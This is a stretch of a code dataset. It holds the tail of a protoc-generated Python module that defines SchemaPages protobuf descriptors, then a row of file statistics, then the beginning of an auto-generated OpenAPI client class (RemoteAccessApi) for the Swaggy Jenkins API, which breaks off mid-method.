serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='comment', full_name='SchemaPages.SDOTerm.comment', index=5,
number=7, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='equivalents', full_name='SchemaPages.SDOTerm.equivalents', index=6,
number=8, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='pending', full_name='SchemaPages.SDOTerm.pending', index=7,
number=9, type=8, cpp_type=7, label=2,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='retired', full_name='SchemaPages.SDOTerm.retired', index=8,
number=10, type=8, cpp_type=7, label=2,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='supersededBy', full_name='SchemaPages.SDOTerm.supersededBy', index=9,
number=11, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='supersedes', full_name='SchemaPages.SDOTerm.supersedes', index=10,
number=12, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='sources', full_name='SchemaPages.SDOTerm.sources', index=11,
number=13, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=67,
serialized_end=346,
)
_SDOBASETYPE = _descriptor.Descriptor(
name='SDOBaseType',
full_name='SchemaPages.SDOBaseType',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='id', full_name='SchemaPages.SDOBaseType.id', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='termdescriptor', full_name='SchemaPages.SDOBaseType.termdescriptor', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='properties', full_name='SchemaPages.SDOBaseType.properties', index=2,
number=3, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='allproperties', full_name='SchemaPages.SDOBaseType.allproperties', index=3,
number=4, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='expectedTypeFor', full_name='SchemaPages.SDOBaseType.expectedTypeFor', index=4,
number=5, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enumerationMembers', full_name='SchemaPages.SDOBaseType.enumerationMembers', index=5,
number=6, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='subs', full_name='SchemaPages.SDOBaseType.subs', index=6,
number=9, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='supers', full_name='SchemaPages.SDOBaseType.supers', index=7,
number=10, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='termStack', full_name='SchemaPages.SDOBaseType.termStack', index=8,
number=11, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=349,
serialized_end=565,
)
_SDOPROPERTY = _descriptor.Descriptor(
name='SDOProperty',
full_name='SchemaPages.SDOProperty',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='id', full_name='SchemaPages.SDOProperty.id', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='termdescriptor', full_name='SchemaPages.SDOProperty.termdescriptor', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='domainIncludes', full_name='SchemaPages.SDOProperty.domainIncludes', index=2,
number=3, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='rangeIncludes', full_name='SchemaPages.SDOProperty.rangeIncludes', index=3,
number=4, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='inverse', full_name='SchemaPages.SDOProperty.inverse', index=4,
number=5, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='subs', full_name='SchemaPages.SDOProperty.subs', index=5,
number=6, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='supers', full_name='SchemaPages.SDOProperty.supers', index=6,
number=7, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='termStack', full_name='SchemaPages.SDOProperty.termStack', index=7,
number=8, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=568,
serialized_end=752,
)
_SDOENUMERATIONVALUE = _descriptor.Descriptor(
name='SDOEnumerationValue',
full_name='SchemaPages.SDOEnumerationValue',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='id', full_name='SchemaPages.SDOEnumerationValue.id', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='termdescriptor', full_name='SchemaPages.SDOEnumerationValue.termdescriptor', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enumerationParent', full_name='SchemaPages.SDOEnumerationValue.enumerationParent', index=2,
number=3, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=754,
serialized_end=860,
)
_SDOREFERENCE = _descriptor.Descriptor(
name='SDOReference',
full_name='SchemaPages.SDOReference',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='id', full_name='SchemaPages.SDOReference.id', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='uri', full_name='SchemaPages.SDOReference.uri', index=1,
number=2, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=862,
serialized_end=901,
)
_SDOBASETYPEEXPANDED = _descriptor.Descriptor(
name='SDOBaseTypeExpanded',
full_name='SchemaPages.SDOBaseTypeExpanded',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='id', full_name='SchemaPages.SDOBaseTypeExpanded.id', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='termdescriptor', full_name='SchemaPages.SDOBaseTypeExpanded.termdescriptor', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='properties', full_name='SchemaPages.SDOBaseTypeExpanded.properties', index=2,
number=3, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='expectedTypeFor', full_name='SchemaPages.SDOBaseTypeExpanded.expectedTypeFor', index=3,
number=4, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enumerationMembers', full_name='SchemaPages.SDOBaseTypeExpanded.enumerationMembers', index=4,
number=5, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='subs', full_name='SchemaPages.SDOBaseTypeExpanded.subs', index=5,
number=6, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='supers', full_name='SchemaPages.SDOBaseTypeExpanded.supers', index=6,
number=7, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='termStack', full_name='SchemaPages.SDOBaseTypeExpanded.termStack', index=7,
number=8, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=904,
serialized_end=1200,
)
_SDOBASETYPEEXPANDEDPROPSONLY = _descriptor.Descriptor(
name='SDOBaseTypeExpandedPropsOnly',
full_name='SchemaPages.SDOBaseTypeExpandedPropsOnly',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='id', full_name='SchemaPages.SDOBaseTypeExpandedPropsOnly.id', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='termdescriptor', full_name='SchemaPages.SDOBaseTypeExpandedPropsOnly.termdescriptor', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='properties', full_name='SchemaPages.SDOBaseTypeExpandedPropsOnly.properties', index=2,
number=3, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='expectedTypeFor', full_name='SchemaPages.SDOBaseTypeExpandedPropsOnly.expectedTypeFor', index=3,
number=4, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enumerationMembers', full_name='SchemaPages.SDOBaseTypeExpandedPropsOnly.enumerationMembers', index=4,
number=5, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='subs', full_name='SchemaPages.SDOBaseTypeExpandedPropsOnly.subs', index=5,
number=6, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='supers', full_name='SchemaPages.SDOBaseTypeExpandedPropsOnly.supers', index=6,
number=7, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='termStack', full_name='SchemaPages.SDOBaseTypeExpandedPropsOnly.termStack', index=7,
number=8, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=1203,
serialized_end=1465,
)
_SDOTERM.fields_by_name['termType'].enum_type = _TERMTYPE
_SDOTERM.fields_by_name['superPaths'].message_type = _SUPERPATH
_SDOBASETYPE.fields_by_name['termdescriptor'].message_type = _SDOTERM
_SDOPROPERTY.fields_by_name['termdescriptor'].message_type = _SDOTERM
_SDOENUMERATIONVALUE.fields_by_name['termdescriptor'].message_type = _SDOTERM
_SDOBASETYPEEXPANDED.fields_by_name['termdescriptor'].message_type = _SDOTERM
_SDOBASETYPEEXPANDED.fields_by_name['properties'].message_type = _SDOPROPERTY
_SDOBASETYPEEXPANDED.fields_by_name['expectedTypeFor'].message_type = _SDOPROPERTY
_SDOBASETYPEEXPANDED.fields_by_name['termStack'].message_type = _SDOBASETYPEEXPANDEDPROPSONLY
_SDOBASETYPEEXPANDEDPROPSONLY.fields_by_name['termdescriptor'].message_type = _SDOTERM
_SDOBASETYPEEXPANDEDPROPSONLY.fields_by_name['properties'].message_type = _SDOPROPERTY
_SDOBASETYPEEXPANDEDPROPSONLY.fields_by_name['expectedTypeFor'].message_type = _SDOPROPERTY
DESCRIPTOR.message_types_by_name['SuperPath'] = _SUPERPATH
DESCRIPTOR.message_types_by_name['SDOTerm'] = _SDOTERM
DESCRIPTOR.message_types_by_name['SDOBaseType'] = _SDOBASETYPE
DESCRIPTOR.message_types_by_name['SDOProperty'] = _SDOPROPERTY
DESCRIPTOR.message_types_by_name['SDOEnumerationValue'] = _SDOENUMERATIONVALUE
DESCRIPTOR.message_types_by_name['SDOReference'] = _SDOREFERENCE
DESCRIPTOR.message_types_by_name['SDOBaseTypeExpanded'] = _SDOBASETYPEEXPANDED
DESCRIPTOR.message_types_by_name['SDOBaseTypeExpandedPropsOnly'] = _SDOBASETYPEEXPANDEDPROPSONLY
DESCRIPTOR.enum_types_by_name['TermType'] = _TERMTYPE
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
SuperPath = _reflection.GeneratedProtocolMessageType('SuperPath', (_message.Message,), {
'DESCRIPTOR' : _SUPERPATH,
'__module__' : 'schemapages_pb2'
# @@protoc_insertion_point(class_scope:SchemaPages.SuperPath)
})
_sym_db.RegisterMessage(SuperPath)
SDOTerm = _reflection.GeneratedProtocolMessageType('SDOTerm', (_message.Message,), {
'DESCRIPTOR' : _SDOTERM,
'__module__' : 'schemapages_pb2'
# @@protoc_insertion_point(class_scope:SchemaPages.SDOTerm)
})
_sym_db.RegisterMessage(SDOTerm)
SDOBaseType = _reflection.GeneratedProtocolMessageType('SDOBaseType', (_message.Message,), {
'DESCRIPTOR' : _SDOBASETYPE,
'__module__' : 'schemapages_pb2'
# @@protoc_insertion_point(class_scope:SchemaPages.SDOBaseType)
})
_sym_db.RegisterMessage(SDOBaseType)
SDOProperty = _reflection.GeneratedProtocolMessageType('SDOProperty', (_message.Message,), {
'DESCRIPTOR' : _SDOPROPERTY,
'__module__' : 'schemapages_pb2'
# @@protoc_insertion_point(class_scope:SchemaPages.SDOProperty)
})
_sym_db.RegisterMessage(SDOProperty)
SDOEnumerationValue = _reflection.GeneratedProtocolMessageType('SDOEnumerationValue', (_message.Message,), {
'DESCRIPTOR' : _SDOENUMERATIONVALUE,
'__module__' : 'schemapages_pb2'
# @@protoc_insertion_point(class_scope:SchemaPages.SDOEnumerationValue)
})
_sym_db.RegisterMessage(SDOEnumerationValue)
SDOReference = _reflection.GeneratedProtocolMessageType('SDOReference', (_message.Message,), {
'DESCRIPTOR' : _SDOREFERENCE,
'__module__' : 'schemapages_pb2'
# @@protoc_insertion_point(class_scope:SchemaPages.SDOReference)
})
_sym_db.RegisterMessage(SDOReference)
SDOBaseTypeExpanded = _reflection.GeneratedProtocolMessageType('SDOBaseTypeExpanded', (_message.Message,), {
'DESCRIPTOR' : _SDOBASETYPEEXPANDED,
'__module__' : 'schemapages_pb2'
# @@protoc_insertion_point(class_scope:SchemaPages.SDOBaseTypeExpanded)
})
_sym_db.RegisterMessage(SDOBaseTypeExpanded)
SDOBaseTypeExpandedPropsOnly = _reflection.GeneratedProtocolMessageType('SDOBaseTypeExpandedPropsOnly', (_message.Message,), {
'DESCRIPTOR' : _SDOBASETYPEEXPANDEDPROPSONLY,
'__module__' : 'schemapages_pb2'
# @@protoc_insertion_point(class_scope:SchemaPages.SDOBaseTypeExpandedPropsOnly)
})
_sym_db.RegisterMessage(SDOBaseTypeExpandedPropsOnly)
# @@protoc_insertion_point(module_scope)
| 47.508357 | 2,854 | 0.755563 | 4,196 | 34,111 | 5.836749 | 0.055529 | 0.054877 | 0.089216 | 0.073864 | 0.754604 | 0.740517 | 0.73133 | 0.710996 | 0.705729 | 0.682659 | 0 | 0.036305 | 0.12386 | 34,111 | 717 | 2,855 | 47.574616 | 0.783176 | 0.020551 | 0 | 0.709581 | 1 | 0.005988 | 0.1649 | 0.121122 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.007485 | 0 | 0.007485 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
77e2b0239f07437cdaa2556b76d7fed98a6bf701 | 79,408 | py | Python | clients/python/generated/swaggyjenkins/api/remote_access_api.py | PankTrue/swaggy-jenkins | aca35a7cca6e1fcc08bd399e05148942ac2f514b | [
"MIT"
] | 23 | 2017-08-01T12:25:26.000Z | 2022-01-25T03:44:11.000Z | clients/python/generated/swaggyjenkins/api/remote_access_api.py | PankTrue/swaggy-jenkins | aca35a7cca6e1fcc08bd399e05148942ac2f514b | [
"MIT"
] | 35 | 2017-06-14T03:28:15.000Z | 2022-02-14T10:25:54.000Z | clients/python/generated/swaggyjenkins/api/remote_access_api.py | PankTrue/swaggy-jenkins | aca35a7cca6e1fcc08bd399e05148942ac2f514b | [
"MIT"
] | 11 | 2017-08-31T19:00:20.000Z | 2021-12-19T12:04:12.000Z | # coding: utf-8
"""
Swaggy Jenkins
Jenkins API clients generated from Swagger / Open API specification # noqa: E501
OpenAPI spec version: 1.1.1
Contact: blah@cliffano.com
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from swaggyjenkins.api_client import ApiClient
class RemoteAccessApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def get_computer(self, depth, **kwargs): # noqa: E501
"""get_computer # noqa: E501
Retrieve computer details # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_computer(depth, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int depth: Recursion depth in response model (required)
:return: ComputerSet
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_computer_with_http_info(depth, **kwargs) # noqa: E501
else:
(data) = self.get_computer_with_http_info(depth, **kwargs) # noqa: E501
return data
def get_computer_with_http_info(self, depth, **kwargs): # noqa: E501
"""get_computer # noqa: E501
Retrieve computer details # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_computer_with_http_info(depth, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int depth: Recursion depth in response model (required)
:return: ComputerSet
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['depth'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_computer" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'depth' is set
if ('depth' not in local_var_params or
local_var_params['depth'] is None):
raise ValueError("Missing the required parameter `depth` when calling `get_computer`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'depth' in local_var_params:
query_params.append(('depth', local_var_params['depth'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['jenkins_auth'] # noqa: E501
return self.api_client.call_api(
'/computer/api/json', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ComputerSet', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_jenkins(self, **kwargs): # noqa: E501
"""get_jenkins # noqa: E501
Retrieve Jenkins details # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_jenkins(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: Hudson
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_jenkins_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_jenkins_with_http_info(**kwargs) # noqa: E501
return data
def get_jenkins_with_http_info(self, **kwargs): # noqa: E501
"""get_jenkins # noqa: E501
Retrieve Jenkins details # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_jenkins_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: Hudson
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_jenkins" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['jenkins_auth'] # noqa: E501
return self.api_client.call_api(
'/api/json', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Hudson', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_job(self, name, **kwargs): # noqa: E501
"""get_job # noqa: E501
Retrieve job details # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_job(name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Name of the job (required)
:return: FreeStyleProject
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_job_with_http_info(name, **kwargs) # noqa: E501
else:
(data) = self.get_job_with_http_info(name, **kwargs) # noqa: E501
return data
def get_job_with_http_info(self, name, **kwargs): # noqa: E501
"""get_job # noqa: E501
Retrieve job details # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_job_with_http_info(name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Name of the job (required)
:return: FreeStyleProject
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
